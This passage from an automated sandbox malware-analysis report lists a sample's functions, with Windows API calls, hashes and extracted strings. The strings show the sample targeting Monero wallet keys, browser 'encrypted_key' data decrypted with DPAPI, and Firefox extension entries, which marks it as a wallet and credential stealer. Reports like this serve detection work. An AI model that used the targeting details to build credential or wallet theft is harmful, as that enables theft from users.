                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: d1894905465049f6b20f421d48cfb9b96b72b8b193ec8cc952d3c0b485acddc8
                                  • Instruction ID: fc7fdc3525b678cb7a410612fa7feb20ebfc139918fc2a6cd679e68133b89f8a
                                  • Opcode Fuzzy Hash: d1894905465049f6b20f421d48cfb9b96b72b8b193ec8cc952d3c0b485acddc8
                                  • Instruction Fuzzy Hash: BE211FB1A40345ABDB04EF98DD85FAEBBB8FB48701F104159F505EB390C77969008BB1
                                  Function 00BB8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BB951E,00000000), ref: 00BB8D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB8D62
                                  • wsprintfW.USER32 ref: 00BB8D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 683a77f7791d614a87916bb6b10a4b843fcbcf13eab8ad9f75456624a4e7d25e
                                  • Instruction ID: 63fb4aefda1d0a4a7616f07b863ecde9e8a2acdd3d8dd52722da347ee95a966f
                                  • Opcode Fuzzy Hash: 683a77f7791d614a87916bb6b10a4b843fcbcf13eab8ad9f75456624a4e7d25e
                                  • Instruction Fuzzy Hash: FCE08670A40309FBC700EB98DC89E597BB8EB04701F004194FD09CB380D9716E009B62
                                  Function 00BAA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAA2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00BAA3FF
                                  • lstrlen.KERNEL32(00000000), ref: 00BAA6BC
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAA743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 790e7c9a3a77cab7a6c0d7ea0801b86486998a201fc91e64194de34745d666b6
                                  • Instruction ID: 5cf5e936d4a0a60305692d6b966018f34df656d1313a4962bd2c6a9f8f6ef8e8
                                  • Opcode Fuzzy Hash: 790e7c9a3a77cab7a6c0d7ea0801b86486998a201fc91e64194de34745d666b6
                                  • Instruction Fuzzy Hash: B2E1DE72C10108ABDB15FBA4DCA2EFE73B8AF14300F508199F516B6591EF706A49CB72
                                  Function 00BAD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD481
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD698
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAD72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c96c08b23d46ba07462926611159985e57b0e7664c8d499b63514041fa82d6fc
                                  • Instruction ID: 0080a3f3c0e347378e81acb9ac0c6d65b6d123ad4fbf8c9b092f1af367f5f084
                                  • Opcode Fuzzy Hash: c96c08b23d46ba07462926611159985e57b0e7664c8d499b63514041fa82d6fc
                                  • Instruction Fuzzy Hash: 6491FF72D10108ABDB14FBA4DCA2EFE73B8AF14300F504199F516B6591EF746A09CB72
                                  Function 00BAD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD801
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD99F
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BADA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: d0e860355e4991cf4228726a66fbbd1ee4cfb64892a31b625aa14686a1989a02
                                  • Instruction ID: 03a619a16bd42c5952de0f804fa2b092aef11b315717e64c40f0700e558687d3
                                  • Opcode Fuzzy Hash: d0e860355e4991cf4228726a66fbbd1ee4cfb64892a31b625aa14686a1989a02
                                  • Instruction Fuzzy Hash: A881FE72D10108ABDB14FBA4DCA6EFE73B8AF14300F5045A8F506B6591EE746A09CB72
                                  Function 00BAF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00BC1580,00BC0D92), ref: 00BAF54C
                                  • lstrlen.KERNEL32(00000000), ref: 00BAF56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 95c3002faacf72a92d29efa159d9e9ac9f20ec197d974001bb60aae80044c31b
                                  • Instruction ID: 213512a68a6d090301ac8a1e163665679d365457418ea893e6b188da588f8056
                                  • Opcode Fuzzy Hash: 95c3002faacf72a92d29efa159d9e9ac9f20ec197d974001bb60aae80044c31b
                                  • Instruction Fuzzy Hash: D851EE75D10108BBDB14FBA4DCA6DFD73B8AF54300F4085A8F816A7591EE746A09CBA2
                                  Function 00BB3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 139ff791aaaff42e4c82cdeb105c40fe1422ca46dbf1f1ccf625bee0db65d380
                                  • Instruction ID: 687ef998bf55c430b6235427f84b561dd60ebf0dffcb992c58d6805e9433722e
                                  • Opcode Fuzzy Hash: 139ff791aaaff42e4c82cdeb105c40fe1422ca46dbf1f1ccf625bee0db65d380
                                  • Instruction Fuzzy Hash: 0E414E75D14209EFCB04EFA5D895EFEB7F8AB44704F008058E41676290DBB4AA45CFA2
                                  Function 00BA9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
                                    • Part of subcall function 00BA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BA9A11
                                    • Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
                                    • Part of subcall function 00BA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BA9A5A
                                    • Part of subcall function 00BA99C0: LocalFree.KERNEL32(00BA148F), ref: 00BA9A90
                                    • Part of subcall function 00BA99C0: CloseHandle.KERNEL32(000000FF), ref: 00BA9A9A
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BA9D39
                                    • Part of subcall function 00BA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9AEF
                                    • Part of subcall function 00BA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B01
                                    • Part of subcall function 00BA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4EEE,00000000,00000000), ref: 00BA9B2A
                                    • Part of subcall function 00BA9AC0: LocalFree.KERNEL32(?,?,?,?,00BA4EEE,00000000,?), ref: 00BA9B3F
                                    • Part of subcall function 00BA9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BA9B84
                                    • Part of subcall function 00BA9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BA9BA3
                                    • Part of subcall function 00BA9B60: LocalFree.KERNEL32(?), ref: 00BA9BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 5b24143c7afc74289e79285fdd0c7f569280174bd3a2e0d5a7a0c3c7db5f3f97
                                  • Instruction ID: 60f6e4dfd58fe3a14e63d70d2572b4e9048f80760d7e851d7d2a77f7e3d9a01e
                                  • Opcode Fuzzy Hash: 5b24143c7afc74289e79285fdd0c7f569280174bd3a2e0d5a7a0c3c7db5f3f97
                                  • Instruction Fuzzy Hash: B0313EB6D14209ABCB04DFE4DC85EEFB7F8EB49304F1445A9E905A7241EB309A44CBA1
                                  Function 00BB92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00BB3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00BB3AEE,?), ref: 00BB92FC
                                  • GetFileSizeEx.KERNEL32(000000FF,00BB3AEE), ref: 00BB9319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00BB9327
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
